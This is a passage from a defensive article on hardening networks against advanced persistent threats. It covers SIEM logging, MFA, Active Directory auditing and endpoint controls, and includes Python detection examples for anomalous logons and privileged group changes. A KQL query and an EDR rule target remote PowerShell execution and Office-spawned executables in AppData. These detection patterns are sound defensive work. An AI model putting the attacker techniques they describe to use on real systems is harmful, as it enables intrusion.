A SIEM detects a PowerShell scan initiated from an HR user account at 2:00 AM—a behavior that clearly deviates from the user’s typical pattern.

# Example Kibana (KQL) query to surface PowerShell remoting by that account;
# the wildcard must stay unquoted, otherwise KQL matches the * literally
process.name: "powershell.exe" and process.command_line: *Invoke-Command* and user.name: "hr_user"

Logging doesn’t just support real-time monitoring—it provides historical visibility that’s crucial when analyzing a breach that has been ongoing for weeks or months.

Account Hardening: securing identity

User accounts are one of the most targeted attack surfaces. Once an attacker gains valid credentials, they can move laterally, escalate privileges, or impersonate legitimate users.

Best practices:

  • Multi-Factor Authentication (MFA)
    Required for all external and privileged access.
  • Centralized password management
    Using tools like HashiCorp Vault, CyberArk, or Bitwarden Enterprise.
  • Least privilege
    No standing admin rights on daily-use accounts, separate accounts for administration, and no predictable privileged names like “admin”.

Example:

If a user normally logs in from Milan between 9:00 and 18:00, a login attempt from Singapore at 3:00 AM should trigger an automated alert.
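The two scenarios above (PowerShell from an HR account at 2:00 AM, a Milan user logging in from Singapore at 3:00 AM) are the same check: build a per-user baseline and score new events against it. As an added example that is not part of the original article, the following builds baselines of seen hours and countries from constructed logon history and reports the deviation reasons for new logons. The event shape, the minimum history size and the one-hour slack are assumptions.

```python
"""Baseline-and-deviation check for user logons (UEBA style).

Added example, not part of the original article. Builds, per user, the set
of countries and hours observed in a history of constructed logon events,
then scores new logons: unseen country, unusual hour, or both. The event
shape (user, ISO timestamp, country code), the minimum history size and
the one-hour slack are assumptions; a real UEBA product does the same
with many more features and a learned, not fixed, tolerance.
"""
from collections import defaultdict
from datetime import datetime

# Constructed history: hr_user works office hours from Italy,
# ops_admin is on a night shift, also from Italy.
HISTORY = (
    [("hr_user", f"2024-04-{d:02d}T09:12:00", "IT") for d in range(1, 13)]
    + [("hr_user", f"2024-04-{d:02d}T17:40:00", "IT") for d in range(1, 13)]
    + [("ops_admin", f"2024-04-{d:02d}T02:10:00", "IT") for d in range(1, 13)]
)

NEW_EVENTS = [
    ("hr_user", "2024-04-12T10:05:00", "IT"),    # normal
    ("hr_user", "2024-04-13T03:02:00", "SG"),    # Singapore at 3 AM
    ("hr_user", "2024-04-13T16:30:00", "SG"),    # new country, usual hours
    ("ops_admin", "2024-04-13T02:30:00", "IT"),  # normal for this user
]


def build_baseline(events, min_events=10):
    """Per user: seen countries and seen hours. Users with fewer than
    min_events observations get no baseline, so a thin one is never trusted."""
    countries, hours, counts = defaultdict(set), defaultdict(set), defaultdict(int)
    for user, ts, country in events:
        countries[user].add(country)
        hours[user].add(datetime.fromisoformat(ts).hour)
        counts[user] += 1
    return {u: {"countries": countries[u], "hours": hours[u]}
            for u, n in counts.items() if n >= min_events}


def score_logon(baseline, event):
    """Return the list of deviation reasons; empty means consistent."""
    user, ts, country = event
    if user not in baseline:
        return ["no baseline"]
    b, reasons = baseline[user], []
    if country not in b["countries"]:
        reasons.append(f"new country {country}")
    hour = datetime.fromisoformat(ts).hour
    # one hour of slack either side of any previously seen hour
    if not any(abs(hour - h) <= 1 for h in b["hours"]):
        reasons.append(f"unusual hour {hour:02d}:00")
    return reasons


def review(baseline, events):
    """Map (user, timestamp) to its deviation reasons."""
    return {(u, ts): score_logon(baseline, (u, ts, c)) for u, ts, c in events}


if __name__ == "__main__":
    baseline = build_baseline(HISTORY)
    for key, reasons in review(baseline, NEW_EVENTS).items():
        print(key, "->", reasons or "ok")
```

Note that ops_admin at 02:30 is not an alert: the baseline is per user, which is the whole point of UEBA over a static "no logins after 20:00" rule. Country alone is also a weak signal on its own (VPN exits, travel); the combination of reasons, plus what the account does next, is what should drive the response.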

Active Directory Hardening: securing the core

Active Directory (AD) is often the ultimate prize for attackers—it controls user privileges, access policies, and network visibility. Hardening AD is therefore a top priority.

Defensive strategies:

  • Tiered admin model: separate Tier 0 (Domain Admins) from Tier 1 (servers) and Tier 2 (workstations)
  • LAPS (Local Administrator Password Solution): a unique, rotated local admin password per machine, so one dumped hash does not open every workstation
  • Audit changes to groups and policies regularly

Technical example:

Enable auditing for security group modifications:

auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable

With this subcategory enabled, the domain controller logs every membership change as Event ID 4728/4729 (global groups) or 4732/4733 (domain-local groups), so unauthorized additions to “Domain Admins” can be alerted on in real time.
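Once the events are being logged, something has to look at them. As an added example (not from the original article), this check raises alerts for the 4728/4729, 4732/4733 and 4756/4757 events that touch privileged groups, unless the actor is on an allow-list, and escalates self-grants and memberships that are removed again within an hour, a common cover-your-tracks pattern. The events, the group list and the allow-list are constructed assumptions.

```python
"""Alerting on membership changes to privileged Active Directory groups.

Added example, not from the original article. With the "Security Group
Management" subcategory enabled, a domain controller logs 4728/4729
(member added to / removed from a security-enabled global group),
4732/4733 (domain-local) and 4756/4757 (universal). In those events
SubjectUserName is the actor, TargetUserName the group and MemberName the
member's distinguished name. Events, group list and allow-list are
constructed assumptions.
"""
from datetime import datetime, timedelta

ADD_EVENTS = {4728, 4732, 4756}
REMOVE_EVENTS = {4729, 4733, 4757}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Account Operators"}
APPROVED_ACTORS = {"svc-pam"}          # e.g. a PAM service account acting on tickets
TRANSIENT_WINDOW = timedelta(hours=1)  # add-then-remove inside this window

SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "svc-pam", "TargetUserName": "Domain Admins",
     "MemberName": "CN=t0-admin-jr,OU=Tier0,DC=corp,DC=local", "TimeCreated": "2024-05-03T09:14:00"},
    {"EventID": 4728, "SubjectUserName": "hr_user", "TargetUserName": "Domain Admins",
     "MemberName": "CN=hr_user,OU=Users,DC=corp,DC=local", "TimeCreated": "2024-05-03T02:07:00"},
    {"EventID": 4732, "SubjectUserName": "hr_user", "TargetUserName": "Administrators",
     "MemberName": "CN=svc-backup,OU=Service,DC=corp,DC=local", "TimeCreated": "2024-05-03T02:08:00"},
    {"EventID": 4728, "SubjectUserName": "helpdesk1", "TargetUserName": "Sales",
     "MemberName": "CN=new-hire,OU=Users,DC=corp,DC=local", "TimeCreated": "2024-05-03T10:00:00"},
    {"EventID": 4729, "SubjectUserName": "hr_user", "TargetUserName": "Domain Admins",
     "MemberName": "CN=hr_user,OU=Users,DC=corp,DC=local", "TimeCreated": "2024-05-03T02:40:00"},
]


def _cn(dn):
    """Extract the CN from a distinguished name such as 'CN=x,OU=y,...'."""
    first = dn.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def privileged_group_changes(events, groups=PRIVILEGED_GROUPS, approved=APPROVED_ACTORS):
    """Return alert dicts, in time order, for privileged-group changes made
    by actors outside the allow-list."""
    alerts = []
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        eid = e["EventID"]
        if eid not in ADD_EVENTS and eid not in REMOVE_EVENTS:
            continue
        if e["TargetUserName"] not in groups or e["SubjectUserName"] in approved:
            continue
        member = _cn(e["MemberName"])
        action = "added" if eid in ADD_EVENTS else "removed"
        # granting yourself membership is the loudest single signal
        self_grant = action == "added" and member == e["SubjectUserName"]
        alerts.append({"time": e["TimeCreated"], "actor": e["SubjectUserName"],
                       "action": action, "member": member, "group": e["TargetUserName"],
                       "severity": "critical" if self_grant else "high",
                       "transient": False})
    # An add undone within TRANSIENT_WINDOW: rights granted, used, then removed.
    for a in alerts:
        if a["action"] != "added":
            continue
        t_add = datetime.fromisoformat(a["time"])
        for r in alerts:
            if r["action"] == "removed" and (r["member"], r["group"]) == (a["member"], a["group"]):
                delta = datetime.fromisoformat(r["time"]) - t_add
                if timedelta(0) <= delta <= TRANSIENT_WINDOW:
                    a["severity"], a["transient"] = "critical", True
    return alerts


if __name__ == "__main__":
    for a in privileged_group_changes(SAMPLE_EVENTS):
        print(a)
```

The allow-list is the part to get right: the only actor that should ever touch Tier 0 groups is whatever workflow issues approved, time-bound elevations, so every other actor is an alert by definition, not an anomaly to be scored.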

Endpoint Hardening: fortifying entry points

Endpoints—laptops, desktops, and mobile devices—are typically the first targets in an APT campaign, often compromised via phishing or exploits.

Recommended measures:

  • EDR solutions
    Such as CrowdStrike, SentinelOne, or Microsoft Defender for Endpoint
  • Application control
    Via AppLocker or Windows Defender Application Control to restrict script execution
  • Aggressive patching
    Especially for browsers, office suites, and VPN clients

BYOD (Bring Your Own Device) strategies:

  • Enforce device segmentation
  • Use MDM solutions like Intune, Jamf, or Kandji
  • Allow internal access only from managed, compliant devices

Example:

An EDR can be configured to block any executable launched from a user-writable directory such as AppData\Roaming when its parent is an Office process (the pattern left by the macro examples in the Initial Compromise section). The rule below is written in an illustrative pseudo-syntax, not in any specific product’s rule language:

{
  "rule": {
    "if": "process.path == '*\\AppData\\Roaming\\*.exe' && parent_process.name in ['winword.exe', 'excel.exe', 'outlook.exe']",
    "then": "block_and_alert"
  }
}

Beyond technology: building a security culture

Technology alone is not enough. A mature cyber security posture requires a culture of awareness and responsibility across all levels of the organization. Key components:

  • Continuous employee training on phishing, social engineering, and secure behavior
  • Regular red team and purple team exercises to test real-world defenses
  • Executive involvement to embed security into business decision-making

APTs: a constantly evolving threat

APT threats are not static—they evolve. Modern trends include:

  • Use of AI and machine learning to avoid detection
  • Exploiting cloud-native environments
  • Attacking supply chains and CI/CD pipelines
  • Sophisticated social engineering tactics

Staying informed via computer security news and cyber security news is essential. Every week, new groups, new exploits, and new threats emerge—APT security is a moving target.


Questions and answers

  1. What does APT mean?
    APT stands for Advanced Persistent Threat—a long-term, stealthy cyberattack.
  2. Who are common targets of APTs?
    Governments, enterprises in critical sectors, and research institutions.
  3. How does an APT attack work?
    Through a structured, multi-phase process: reconnaissance, compromise, pivoting, and mission execution.
  4. How are APTs different from regular malware?
    They are persistent, stealthy, and often state-sponsored or backed by major crime groups.
  5. What is a zero-day vulnerability?
    A software bug unknown to the vendor and unpatched at the time of exploitation.
  6. Can APTs be prevented?
    Not entirely, but you can significantly reduce the risk with proper security architecture.
  7. What role does a SIEM play in APT defense?
    It helps detect abnormal patterns and correlates data across systems to uncover stealthy intrusions.
  8. Do APTs target small businesses too?
    Yes, especially if they’re part of a larger supply chain or have valuable intellectual property.
  9. What is lateral movement?
    When attackers move through a network to access other systems after initial compromise.